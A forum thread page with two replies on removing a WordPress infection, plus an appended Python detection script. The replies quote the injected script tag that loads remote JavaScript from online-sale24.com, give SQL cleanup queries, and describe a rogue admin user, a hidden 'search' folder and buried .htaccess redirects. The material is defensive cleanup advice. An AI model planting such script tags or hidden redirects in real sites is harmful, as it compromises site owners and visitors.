Forum Replies Created

Viewing 3 replies - 1 through 3 (of 3 total)
  • Use SQL queries like this, replacing parts of this “<script type='text/javascript' src='http://online-sale24.com/1.js'></script>”

    UPDATE wp_options SET option_value = replace(option_value, '<script', '') WHERE option_name = 'home' OR option_name = 'siteurl';

    UPDATE wp_posts SET guid = replace(guid, '<script', '');

    UPDATE wp_posts SET post_content = replace(post_content, '<script', '');

    UPDATE wp_postmeta SET meta_value = replace(meta_value, '<script', '');

    I have also found inside the Users, in WordPress admin, another user created by the virus:

    Username: tEEebe777811, email: [email protected]

    You should delete this user from the DB itself; it’s safer that way. Change your administrator password as soon as possible. Basically, the virus could administrate your website as it pleased, as it had the administrator role inside the admin of your website.

    I have also searched for “online-sale” inside my DB and I have found over 50 articles containing this script:

    <script type='text/javascript' src='http://online-sale24.com/1.js'></script>

    So you should check this too. This attack is far more complex than I thought.

    I hope I helped you find a way to remove it.

  • Hi all,

    I faced the same problem as you all did. After hours and days of searching, I found, by myself and by mistake, the source of this virus.

    First, in the root of my website I found a folder called “search”.

    It contains a folder called “cache” and a file called “search.php” and a .htaccess file.

    Inside the cache folder of this search folder, there are 5 other folders called:
    css
    html
    jpg
    js
    xml

    Basically, the virus gets built out of this folder. I also found some redirects in my root’s .htaccess file, but very, very low down in the file. So search very carefully; it’s below what you can first see.

    I will not post the contents of search.php as I don’t want to create any problems for this website.

    So, I hope I helped you a bit and best regards to you all. Delete this “search” folder and the weird redirects in your .htaccess and everything should be fine. You could also check your theme’s header.php, just in case.

    Best regards,
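
A defender-side check for the two filesystem signs described in the reply above (the "search" folder layout and redirects pushed far down the root .htaccess), added here as an example and not part of the original posts. The function names, the 20-blank-line threshold and the sample tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Layout reported in the post: <webroot>/search/{search.php,.htaccess,cache/{css,html,jpg,js,xml}}
CACHE_DIRS = {"css", "html", "jpg", "js", "xml"}
REDIRECT = re.compile(r"^\s*(Redirect|RedirectMatch|RewriteRule)\b", re.I)


def matches_search_layout(webroot):
    """True if webroot/search has the files and cache subfolders listed in the post."""
    d = Path(webroot) / "search"
    if not (d / "search.php").is_file() or not (d / ".htaccess").is_file():
        return False
    cache = d / "cache"
    found = {p.name for p in cache.iterdir() if p.is_dir()} if cache.is_dir() else set()
    return CACHE_DIRS <= found


def hidden_redirects(htaccess_text, gap=20):
    """Return (line_number, directive) for redirect rules that follow a run of
    at least `gap` blank lines (20 is an assumed threshold, tune as needed)."""
    hits, blanks, padded = [], 0, False
    for n, line in enumerate(htaccess_text.splitlines(), 1):
        if not line.strip():
            blanks += 1
            padded = padded or blanks >= gap
            continue
        blanks = 0
        if padded and REDIRECT.match(line):
            hits.append((n, line.strip()))
    return hits


def build_sample(root):
    """Constructed sample tree and .htaccess (placeholders, not from a real infection)."""
    base = Path(root) / "search"
    for sub in CACHE_DIRS:
        (base / "cache" / sub).mkdir(parents=True)
    (base / "search.php").write_text("<?php // placeholder\n")
    (base / ".htaccess").write_text("# placeholder\n")
    rules = "RewriteEngine On\n" + "\n" * 300 + "Redirect 302 / http://example.invalid/\n"
    (Path(root) / ".htaccess").write_text(rules)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        print("search/ layout:", matches_search_layout(root))
        print("padded redirects:", hidden_redirects((Path(root) / ".htaccess").read_text()))
```

A hit from either function is only a prompt to inspect the folder or the reported .htaccess line by hand; a legitimate site can have its own "search" directory.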
